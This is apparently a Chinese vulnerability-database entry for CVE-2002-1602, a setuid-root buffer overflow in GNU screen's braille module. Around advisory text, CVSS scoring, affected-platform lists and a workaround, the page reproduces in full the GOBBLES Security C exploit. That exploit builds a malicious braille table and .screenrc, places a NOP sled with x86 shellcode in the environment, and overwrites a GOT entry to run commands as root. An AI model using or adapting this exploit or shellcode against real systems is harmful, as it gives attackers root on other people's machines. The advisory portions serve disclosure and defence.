CVE-2002-1602
CVSS4.6
发布时间 :2002-04-23 00:00:00
修订时间 :2008-09-05 16:31:02
NMCOES    

[原文]Buffer overflow in the Braille module for GNU screen 3.9.11, when HAVE_BRAILLE is defined, allows local users to execute arbitrary code.


[CNNVD]GNU Screen Braille模块本地缓冲区溢出漏洞(CNNVD-200204-045)

        
        Screen是一款免费开放源代码的终端管理软件,由Free Software Foundation分发和维护,可使用在多种Unix和Linux操作系统下。
        Screen中的braille模块对边界检查不够充分正确,可导致产生缓冲溢出。
        本地攻击者可以提交超长的字符串数据给screen程序,由于braille模块对边界检查处理不当,可导致缓冲区溢出,由于screen以setuid root的属性安装,成功利用可使攻击者以root的权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:gnu:screen:3.9.11GNU screen 3.9.11
cpe:/a:gnu:screen:3.9.9GNU screen 3.9.9
cpe:/a:gnu:screen:3.9.8GNU screen 3.9.8
cpe:/a:gnu:screen:3.9.10GNU screen 3.9.10
cpe:/a:gnu:screen:3.9.4GNU screen 3.9.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1602
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1602
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200204-045
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/524227
(UNKNOWN)  CERT-VN  VU#524227
http://xforce.iss.net/xforce/xfdb/8929
(UNKNOWN)  XF  screen-braille-module-bo(8929)
http://www.securityfocus.com/bid/4578
(UNKNOWN)  BID  4578
http://www.securityfocus.com/archive/1/268998
(UNKNOWN)  BUGTRAQ  20020420 ALERT! ALERT! ALERT! ALERT! ALERT! hehehehe ;Pppppp

- 漏洞信息

GNU Screen Braille模块本地缓冲区溢出漏洞
中危 边界条件错误
2002-04-23 00:00:00 2005-10-20 00:00:00
本地  
        
        Screen是一款免费开放源代码的终端管理软件,由Free Software Foundation分发和维护,可使用在多种Unix和Linux操作系统下。
        Screen中的braille模块对边界检查不够充分正确,可导致产生缓冲溢出。
        本地攻击者可以提交超长的字符串数据给screen程序,由于braille模块对边界检查处理不当,可导致缓冲区溢出,由于screen以setuid root的属性安装,成功利用可使攻击者以root的权限执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用chmod a-s去掉screen的S位。
        厂商补丁:
        GNU
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.gnu.org

- 漏洞信息 (21414)

GNU Screen 3.9.x Braille Module Buffer Overflow Vulnerability (EDBID:21414)
unix local
2002-04-23 Verified
0 Gobbles Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/4578/info

Screen is a freely available, open source terminal management software package. It is distributed and maintained by the Free Software Foundation. It is available for the Unix and Linux platforms.

Under some circumstances, it may be possible for a local user to take advantage of a buffer overflow in screen. Due to insufficient bounds checking performed by the braille module of screen, it is possible for a local user to pass long strings of data to the screen program, which could result in an overflow, and the overwriting of process memory. This could result in the execution of arbitrary code.

/*
  screen 3.9.11 local root exploit for braille module 
  dedicated to the $ecurity Community, where blind leading blind.
  code for: linux/x86

  to use:
  1) edit paths in #defines
  2) gcc -o GOBBLES-own-screen GOBBLES-own-screen.c
  3) ./GOBBLES-own-screen -p
  4) ./GOBBLES-own-screen -f
  5) ./GOBBLES-own-screen -a 0xGOBBLES

  if you want rootshell, that up to you to modify exploit.

  beware vicious remote root exploit coming from GOBBLES for Sun Solaris
  version 6-8, hurry up Sun to make patch. . .
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NULLBASE 	48
#define TABLE		"/home/GOBBLES/hacking/.scrx"
#define SCREENRC	"/home/GOBBLES/hacking/.screenrc"
#define SCREEN		"/home/GOBBLES/hacking/current/screen-3.9.11/screen"
#define FIND		1
#define PUT		0
#define OFFSET		-40300 
#define SHELL		"/bin/bash" 
#define NOP		0x90

void bta(int byte, char *store);
void stuff(int que);

unsigned long get_sp(void)
{       __asm__ ("movl %esp, %eax");
	// rumor is Cousin WOBBLES leaked this public, hehehe thnx!
}

int
main(int argc, char **argv)
{
	char *a, *tmp, buf[64], store[10], c;
	unsigned long address;
	unsigned int w[4];
	int i, b, start;	
	FILE *fd;

	if(argc == 1) {
		fprintf(stderr, "\n%s [ -p ] [ -f ] [ -a <shellcode address> -o <offset to GOT address> ]\n\n", argv[0]);
		fprintf(stderr, "-p switch places shellcode into memory\n");
		fprintf(stderr, "-f switch finds shellcode address\n\n");
		fprintf(stderr, "No switch runs exploit with options:\n");
		fprintf(stderr, "\t-a <shellcode address>\n");
		fprintf(stderr, "\t-o <offset to GOT address>\n\n");
		exit(0);
	}
	
	start = OFFSET;
	
	while((c = getopt(argc, argv, "pfa:o:")) != EOF) {
		switch(c) {
			case 'p':
				stuff(PUT);
				exit(0);
			case 'f':
				stuff(FIND);
				exit(0);
			case 'a':
				sscanf(optarg, "%p", &tmp);
				address = (long)tmp;
				break;
			case 'o':
				start = atoi(optarg);
				break;
			default:
				fprintf(stderr, "hehehehe?\n");
				exit(0);
		}
	}
				
			
	fprintf(stderr, ". preparing evil braille table\n");

	if((fd = fopen(TABLE, "w")) == NULL) {
                perror("fopen");
                exit(1);
        }

	fprintf(stderr, ". converting: 0x%lx into braille table strings\n", address); 
 
	w[0] = (address & 0x000000ff);
        w[1] = (address & 0x0000ff00) >> 8;
        w[2] = (address & 0x00ff0000) >> 16;
        w[3] = (address & 0xff000000) >> 24;
	
	for(i = 0; i < 4; i++) { 
		memset(store, 'o', 9);
		bta(w[i], store);
		memset(buf, '\0', sizeof(buf));
		snprintf(buf, sizeof(buf), "%d ff %s\n", start+i, store);
		fprintf(stderr, ". writing to braille table: %s", buf);
		fprintf(fd, "%s", buf);
	}
	
	fclose(fd);
	
	fprintf(stderr, ". preparing evil .screenrc\n");
		
	if((fd = fopen(SCREENRC, "w")) == NULL) {
                perror("fopen");
                exit(1);
        }
	
	fprintf(fd, "bd_start_braille on\n");
	memset(buf, '\0', sizeof(buf));
	snprintf(buf, sizeof(buf), "bd_braille_table %s\n", TABLE);
	fprintf(fd, "%s", buf);
	fprintf(fd, "bd_type powerbraille_40\n");
	fprintf(fd, "bd_port /dev/ttyS0\n");
	fclose(fd);
	
	fprintf(stderr, ". now exploiting blind, hehehe\n");
	
	if(execl(SCREEN, "screen", "-c", SCREENRC, NULL)) {
		fprintf(stderr, ". error executing\n");
		exit(1);
	} 
}

void
bta(int byte, char *store)
{
	int check[9], i, b, tmp;
	
	check[0] = 0;
	check[1] = 1;
	check[2] = 2;
	check[3] = 4;
	check[4] = 8;
	check[5] = 16;
	check[6] = 32;
	check[7] = 64;
	check[8] = 128;

	tmp = byte;
	for(i = 8; i >= 0; i--) {
		if(check[i] <= tmp) { 
			tmp -= check[i];
			store[i] = 'x';
		}
	}
	
	for(i = 0; i < 9; i++) {
		if(store[i] == 'x') 
			store[i] = NULLBASE + i;
		else
			store[i] = NULLBASE;
	}
	store[9] = '\0';
	fprintf(stderr, ". braille table string for byte: 0x%x is: %s\n", byte, store);
}

void
stuff(int que)   
{
	char *p, codebuf[4097], code[] =
        // borrowed shellcode, GOBBLES lazy today,
	// not sure who to credit for it, if it 
        // yours please email GOBBLES@hushmail.com
        // to be acknowledged!
	"\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
        "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
        "\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
        "\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
        "\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
        "\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
        "\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
        "\x30"
	
	// hehehe..hoping blind not deaf so he can hear beep, hehehe.
	"echo \"Hope you not really blind, because you now owned by unethical penetrator using ethical GOBBLES exploit, hehehehe ;Pppppp\" | wall";
	// also let user on shell provider know system comprimised, hehe.
	char *locate = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
	int i;

	if(que == PUT) {
		// adding many nops to build much suspense hehehe
		memset(&codebuf, '\0', sizeof(codebuf));
        	memset(codebuf, NOP, (sizeof(codebuf) - 1));
        	memcpy(codebuf + (sizeof(codebuf) - strlen(code) - 1), code, strlen(code));
		fprintf(stderr, ". run GOBBLES-own-screen -f\n");
		if(setenv("CODE", codebuf, 1) == -1) {
                	fprintf(stderr, ". no mem for shellcode\n");
                	return;
        	}
		
		system(SHELL);
	}
 	else if(que == FIND) {
		// track down nops
        	fprintf(stderr, ". getting address\n");
		p = (char *)get_sp();
		while((i = strncmp(p, locate, strlen(locate))) != 0) 
			p++;        

		if(i == 0) {
			fprintf(stderr, ". shellcode found at: 0x%lx\n", p+1);
             		return;
		}
		else {
			fprintf(stderr, ". trouble locating shellcode\n");
			return;
		}
	}
}

		

- 漏洞信息

19038
Braille module for GNU HAVE_BRAILLE Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2002-04-20 Unknow
2002-04-20 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

GNU Screen Braille Module Buffer Overflow Vulnerability
Boundary Condition Error 4578
No Yes
2002-04-23 12:00:00 2009-07-11 12:46:00
Vulnerability discovery credited to Gobbles Security.

- 受影响的程序版本

GNU screen 3.9.11
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5 -STABLE
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
- Mandriva Linux Mandrake 8.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 alpha
- Slackware Linux 8.0
- Slackware Linux 7.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
GNU screen 3.9.10
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
+ Conectiva Linux 8.0
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5 -STABLE
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 alpha
+ SCO OpenLinux Server 3.1.1
+ SCO OpenLinux Workstation 3.1.1
- Slackware Linux 8.0
- Slackware Linux 7.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
GNU screen 3.9.9
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5 -STABLE
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 alpha
- Slackware Linux 8.0
- Slackware Linux 7.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
GNU screen 3.9.8
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5 -STABLE
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 alpha
- Slackware Linux 8.0
- Slackware Linux 7.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
GNU screen 3.9.4
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5 -STABLE
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 alpha
- Slackware Linux 8.0
- Slackware Linux 7.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6

- 漏洞讨论

Screen is a freely available, open source terminal management software package. It is distributed and maintained by the Free Software Foundation. It is available for the Unix and Linux platforms.

Under some circumstances, it may be possible for a local user to take advantage of a buffer overflow in screen. Due to insufficient bounds checking performed by the braille module of screen, it is possible for a local user to pass long strings of data to the screen program, which could result in an overflow, and the overwriting of process memory. This could result in the execution of arbitrary code.

- 漏洞利用

This exploit contributed by GOBBLES Security.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站